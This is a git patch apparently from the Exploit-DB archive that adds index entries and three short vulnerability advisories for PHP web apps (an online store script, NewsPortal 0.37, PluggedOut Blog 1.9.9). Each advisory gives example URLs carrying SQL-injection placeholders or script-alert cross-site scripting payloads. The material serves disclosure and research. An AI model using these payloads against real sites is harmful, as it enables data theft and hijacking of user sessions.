From 35d1967763d07fbb41d676f7f4d0c5459f7e0b22 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Mon, 8 Dec 2014 04:51:05 +0000
Subject: [PATCH] Updated 12_08_2014

---
 files.csv                       |  3 +++
 platforms/php/webapps/35480.txt | 22 ++++++++++++++++++++++
 platforms/php/webapps/35481.txt |  9 +++++++++
 platforms/php/webapps/35482.txt |  9 +++++++++
 4 files changed, 43 insertions(+)
 create mode 100755 platforms/php/webapps/35480.txt
 create mode 100755 platforms/php/webapps/35481.txt
 create mode 100755 platforms/php/webapps/35482.txt

diff --git a/files.csv b/files.csv
index 1014d9ffd..506b2699a 100755
--- a/files.csv
+++ b/files.csv
@@ -31954,3 +31954,6 @@ id,file,description,date,author,platform,type,port
 35477,platforms/php/webapps/35477.txt,"XOOPS 2.x Multiple Cross Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0
 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 Tag Nesting Remote Denial of Service Vulnerability",2010-12-21,anonymous,linux,dos,0
 35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 'error' Parameter HTML Injection Vulnerability",2011-03-19,Hector.x90,php,webapps,0
+35480,platforms/php/webapps/35480.txt,"Online store php script Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-03-21,"kurdish hackers team",php,webapps,0
+35481,platforms/php/webapps/35481.txt,"NewsPortal 0.37 'post.php' Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0
+35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 'year' Parameter Cross Site Scripting Vulnerability",2011-03-21,"kurdish hackers team",php,webapps,0
diff --git a/platforms/php/webapps/35480.txt b/platforms/php/webapps/35480.txt
new file mode 100755
index 000000000..5daef4b4b
--- /dev/null
+++ b/platforms/php/webapps/35480.txt
@@ -0,0 +1,22 @@
+source: http://www.securityfocus.com/bid/46960/info
+
+Online store php script is prone to multiple cross-site scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+SQL Injection URIs:
+====================
+
+http://www.example.com/detail.php?prodid=[SQL]
+http://www.example.com/view_wishlist.php?products_id=[SQL]
+http://www.example.com/moreImage.php?prod_id=[SQL]
+http://www.example.com/product2.php?loginn=confirmed&a=&b=&submit=+++Login+++.... [empty Query ]
+http://www.example.com/products.php?cid=21&sid=558&skip=[SQL]
+http://www.example.com/gstatus.php?code=[SQL]
+
+Cross Site Scripting URIs:
+==========================
+
+http://www.example.com/detail.php?prodid=<script>alert(1)</script>
+http://www.example.com/products.php?cid=21&sid=558&skip=<script>alert(1)</script>
+
diff --git a/platforms/php/webapps/35481.txt b/platforms/php/webapps/35481.txt
new file mode 100755
index 000000000..bbc899f67
--- /dev/null
+++ b/platforms/php/webapps/35481.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46961/info
+
+NewsPortal is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+NewsPortal 0.37 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/post.php?newsgroups=<script>alert(28)</script> 
\ No newline at end of file
diff --git a/platforms/php/webapps/35482.txt b/platforms/php/webapps/35482.txt
new file mode 100755
index 000000000..28c598d42
--- /dev/null
+++ b/platforms/php/webapps/35482.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/46962/info
+
+PluggedOut Blog is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+PluggedOut Blog 1.9.9 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/index.php?year=<script>alert(88888)</script> 
\ No newline at end of file